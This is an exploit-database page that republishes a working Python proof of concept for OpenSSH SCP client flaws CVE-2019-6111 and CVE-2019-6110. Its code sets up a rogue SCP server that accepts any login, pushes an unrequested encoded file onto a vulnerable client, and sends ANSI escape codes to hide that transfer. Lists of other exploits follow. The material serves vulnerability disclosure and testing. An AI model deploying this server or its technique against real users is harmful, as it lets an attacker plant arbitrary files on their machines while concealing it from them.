Menu

"OpenSSH SCP Client - Write Arbitrary Files"

Author

"Harry Sintonen"

Platform

multiple

Release date

2019-01-11

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
'''
Title:     SSHtranger Things
Author:    Mark E. Haase <mhaase@hyperiongray.com>
Homepage:  https://www.hyperiongray.com
Date:      2019-01-17
CVE:       CVE-2019-6111, CVE-2019-6110
Advisory:  https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt
Tested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1

We have nicknamed this "SSHtranger Things" because the bug is so old it could be
exploited by an 8-bit Demogorgon. Tested on Python 3.6.7 and requires `paramiko`
package.

The server listens on port 2222. It accepts any username and password, and it
generates a new host key every time you run it.

    $ python3 sshtranger_things.py

Download a file using a vulnerable client. The local path must be a dot:

    $ scp -P 2222 foo@localhost:test.txt .
    The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established.
    RSA key fingerprint is SHA256:C7FhMqqiMpkqG9j+11S2Wv9lQYlN1jkDiipdeFMZT1w.
    Are you sure you want to continue connecting (yes/no)? yes
    Warning: Permanently added '[localhost]:2222' (RSA) to the list of known hosts.
    foo@localhost's password:
    test.txt                                       100%   32     0.7KB/s   00:00

The file you requested (e.g. test.txt) will be saved in your current directory.
If your client is vulnerable, you will have an additional file "exploit.txt"
created in your current directory.

    $ cat test.txt
    This is the file you requested.
    $ cat exploit.txt
    SSHtranger Things

The interesting code is in ScpServer.send_file().
'''
import base64
import gzip
import logging
import paramiko
import paramiko.rsakey
import socket
import threading

logging.basicConfig(level=logging.INFO)

dummy = 'This is the file you requested.\n'
payload = gzip.decompress(base64.b64decode(
    b'H4sIAAa+QFwC/51VQW4CMQy85xV+AX+qqrZwoFSo0orbHvbQQw9NIiH1Af0YLyndjZ2x46'
    b'ygaIGs43jGTjIORJfzh3nIN/IwltH1b+LHeGdxHnXUsoCWD6yYyjt7AfA1XJdLDR8u5yRA'
    b'1/lEjiHbHGafXOMVpySuZaH4Jk1lgjxoocN5YMhRoNhhpA5EWMhlRHBNCWogZYhOnmk2V7'
    b'C4FJgwHxKSEwEzTskrQITtj1gYIurAhWUfsDbWIFyXlRwDc8okeZkCzNyjlMmcT4wxA39d'
    b'zp8OsJDJsGV/wV3I0JwJLNXKlOxJAs5Z7WwqmUZMPZmzqupttkhPRd4ovE8jE0gNyQ5skM'
    b'uVy4jk4BljnYwCQ2CUs53KtnKEYkucQJIEyoGud5wYXQUuXvimAYJMJyLlqkyQHlsK6XLz'
    b'I6Q6m4WKYmOzjRxEhtXWBA1qrvmBVRgGGIoT1dIRKSN+yeaJQQKuNEEadONJjkcdI2iFC4'
    b'Hs55bGI12K2rn1fuN1P4/DWtuwHQYdb+0Vunt5DDpS3+0MLaN7FF73II+PK9OungPEnZrc'
    b'dIyWSE9DHbnVVP4hnF2B79CqV8nTxoWmlomuzjl664HiLbZSdrtEOdIYVqBaTeKdWNccJS'
    b'J+NlZGQJZ7isJK0gs27N63dPn+oefjYU/DMGy2p7en4+7w+nJ8OG0eD/vwC6VpDqYpCwAA'
))

class ScpServer(paramiko.ServerInterface):
    def __init__(self):
        self.event = threading.Event()

    def check_auth_password(self, username, password):
        logging.info('Authenticated with %s:%s', username, password)
        return paramiko.AUTH_SUCCESSFUL

    def check_channel_request(self, kind, chanid):
        logging.info('Opened session channel %d', chanid)
        if kind == "session":
            return paramiko.OPEN_SUCCEEDED
        return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED

    def check_channel_exec_request(self, channel, command):
        command = command.decode('ascii')
        logging.info('Approving exec request: %s', command)
        parts = command.split(' ')
        # Make sure that this is a request to get a file:
        assert parts[0] == 'scp'
        assert '-f' in parts
        file = parts[-1]
        # Send file from a new thread.
        threading.Thread(target=self.send_file, args=(channel, file)).start()
        return True

    def send_file(self, channel, file):
        '''
        The meat of the exploit:
            1. Send the requested file.
            2. Send another file (exploit.txt) that was not requested.
            3. Print ANSI escape sequences to stderr to hide the transfer of
               exploit.txt.
        '''
        def wait_ok():
            assert channel.recv(1024) == b'\x00'
        def send_ok():
            channel.sendall(b'\x00')

        wait_ok()

        logging.info('Sending requested file "%s" to channel %d', file,
            channel.get_id())
        command = 'C0664 {} {}\n'.format(len(dummy), file).encode('ascii')
        channel.sendall(command)
        wait_ok()
        channel.sendall(dummy)
        send_ok()
        wait_ok()

        # This is CVE-2019-6111: whatever file the client requested, we send
        # them 'exploit.txt' instead.
        logging.info('Sending malicious file "exploit.txt" to channel %d',
            channel.get_id())
        command = 'C0664 {} exploit.txt\n'.format(len(payload)).encode('ascii')
        channel.sendall(command)
        wait_ok()
        channel.sendall(payload)
        send_ok()
        wait_ok()

        # This is CVE-2019-6110: the client will display the text that we send
        # to stderr, even if it contains ANSI escape sequences. We can send
        # ANSI codes that clear the current line to hide the fact that a second
        # file was transmitted..
        logging.info('Covering our tracks by sending ANSI escape sequence')
        channel.sendall_stderr("\x1b[1A".encode('ascii'))
        channel.close()

def main():
    logging.info('Creating a temporary RSA host key...')
    host_key = paramiko.rsakey.RSAKey.generate(1024)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(('localhost', 2222))
    sock.listen(0)
    logging.info('Listening on port 2222...')

    while True:
        client, addr = sock.accept()
        logging.info('Received connection from %s:%s', *addr)
        transport = paramiko.Transport(client)
        transport.add_server_key(host_key)
        server = ScpServer()
        transport.start_server(server=server)

if __name__ == '__main__':
    main()
Release Date Title Type Platform Author
2019-08-15 "NSKeyedUnarchiver - Info Leak in Decoding SGBigUTF8String" dos multiple "Google Security Research"
2019-08-12 "ManageEngine OpManager 12.4x - Unauthenticated Remote Command Execution (Metasploit)" remote multiple AkkuS
2019-08-12 "ManageEngine Application Manager 14.2 - Privilege Escalation / Remote Command Execution (Metasploit)" remote multiple AkkuS
2019-08-12 "ManageEngine OpManager 12.4x - Privilege Escalation / Remote Command Execution (Metasploit)" remote multiple AkkuS
2019-08-12 "WebKit - UXSS via XSLT and Nested Document Replacements" dos multiple "Google Security Research"
2019-08-08 "Aptana Jaxer 1.0.3.4547 - Local File inclusion" webapps multiple "Steph Jensen"
2019-08-07 "Google Chrome 74.0.3729.0 / 76.0.3789.0 - Heap Use-After-Free in blink::PresentationAvailabilityState::UpdateAvailability" dos multiple "Google Security Research"
2019-08-05 "ARMBot Botnet - Arbitrary Code Execution" remote multiple prsecurity
2019-08-01 "Ultimate Loan Manager 2.0 - Cross-Site Scripting" webapps multiple "Metin Yunus Kandemir"
2019-07-31 "Oracle Hyperion Planning 11.1.2.3 - XML External Entity" webapps multiple "Lucas Dinucci"
2019-07-30 "iMessage - NSKeyedUnarchiver Deserialization Allows file Backed NSData Objects" dos multiple "Google Security Research"
2019-07-30 "iMessage - Memory Corruption when Decoding NSKnownKeysDictionary1" dos multiple "Google Security Research"
2019-07-30 "iMessage - NSArray Deserialization can Invoke Subclass that does not Retain References" dos multiple "Google Security Research"
2019-07-30 "macOS / iOS JavaScriptCore - JSValue Use-After-Free in ValueProfiles" dos multiple "Google Security Research"
2019-07-30 "macOS / iOS JavaScriptCore - Loop-Invariant Code Motion (LICM) Leaves Object Property Access Unguarded" dos multiple "Google Security Research"
2019-07-30 "macOS / iOS NSKeyedUnarchiver - Use-After-Free of ObjC Objects when Unarchiving OITSUIntDictionary Instances" dos multiple "Google Security Research"
2019-01-12 "ASAN/SUID - Local Privilege Escalation" local multiple bcoles
2019-01-13 "Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (2)" local multiple bcoles
2018-12-30 "Deepin Linux 15 - 'lastore-daemon' Local Privilege Escalation" local multiple bcoles
2019-01-13 "S-nail < 14.8.16 - Local Privilege Escalation" local multiple bcoles
2018-12-30 "VMware Workstation/Player < 12.5.5 - Local Privilege Escalation" local multiple bcoles
2019-07-25 "WebKit - Universal Cross-Site Scripting due to Synchronous Page Loads" dos multiple "Google Security Research"
2019-07-24 "Trend Micro Deep Discovery Inspector IDS - Security Bypass" remote multiple hyp3rlinx
2019-07-12 "Xymon 4.3.25 - useradm Command Execution (Metasploit)" remote multiple Metasploit
2019-07-10 "Mozilla Spidermonkey - Unboxed Objects Uninitialized Memory Access" dos multiple "Google Security Research"
2019-07-09 "Firefox 67.0.4 - Denial of Service" dos multiple "Tejas Ajay Naik"
2019-07-03 "Symantec DLP 15.5 MP1 - Cross-Site Scripting" webapps multiple "Chapman Schleiss"
2019-07-01 "CyberPanel 1.8.4 - Cross-Site Request Forgery" webapps multiple "Bilgi Birikim Sistemleri"
2019-07-01 "Sahi pro 8.x - Directory Traversal" webapps multiple "Alexander Bluestein"
2019-07-01 "SAP Crystal Reports - Information Disclosure" webapps multiple "Mohamed M.Fouad"
Release Date Title Type Platform Author
2019-01-11 "OpenSSH SCP Client - Write Arbitrary Files" remote multiple "Harry Sintonen"
2017-04-07 "QNAP TVS-663 QTS < 4.2.4 build 20170313 - Command Injection" webapps cgi "Harry Sintonen"
2018-05-06 "GNU wget - Cookie Injection" local linux "Harry Sintonen"
2011-02-03 "VideoLAN VLC Media Player 1.1 - Subtitle 'StripTags()' Memory Corruption" dos multiple "Harry Sintonen"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46516/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46516/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46516/40963/openssh-scp-client-write-arbitrary-files/download/", "exploit_id": "46516", "exploit_description": "\"OpenSSH SCP Client - Write Arbitrary Files\"", "exploit_date": "2019-01-11", "exploit_author": "\"Harry Sintonen\"", "exploit_type": "remote", "exploit_platform": "multiple", "exploit_port": null}
                                            

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse